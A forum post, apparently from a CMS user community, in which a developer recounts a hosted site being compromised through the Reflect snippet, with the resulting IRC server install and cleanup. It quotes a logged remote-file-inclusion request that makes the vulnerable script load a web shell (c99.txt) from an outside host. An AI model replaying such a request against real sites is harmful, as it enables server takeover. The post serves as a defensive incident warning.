Hi guys I just thought I shared what I’m in the middle of at the moment.
Here’s the prelim results of what to look out for.
I had the reflect snippet code installed, and I got a nice phone call from the host where a site I developed was on, telling me there was a security issue.... I thought, oh yeah. ’fix it then.’ They did, and broke the site. They were referring to the cache and images directories, which are not security issues, they just allow a one way file to be updated for the manager.
Anyway, the site was then restored.
However, yesterday the problem got worse, and the site was shutdown and I was told of the full extent, and which actual file was to blame. All points for them picking this up!
The bad file was the snippet code assets/snippets/reflect/snippet.reflect.php
The buggers accessed it like so: GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http%3A%2F%2Fwww.kuiwa.at%2Fc99.txt%3F%3F&act=img&mg=ext_hibur
(yes this is a partial server log.)
( <
http://www.kuiwa.at%2Fc99.txt%3F%3F&act=img&img=ext_hibur> HTTP/1.1 )
The short of it is this.
While backing up the site (just in case) I noticed a strange directory which I know I didn’t put on the server. They had copied an IRC server to \assets\galleries\apache\unreal3.2.7\
This directory also had a changed permission and owner to apache, so on our normal ftp access, you can’t delete it.
From what I can understand, the server was brought down by this gaming IRC server.
Yes, my web server did have globals on. But maybe they will change it now...
But we are working to get it up and running. So far it appears that nothing else has been compromised. I am throughly checking for anything else strange. It appears ok so far though.
They did also put in a couple of other strange files in weird places as well.
All scripts.
If there is much more, I will let you know.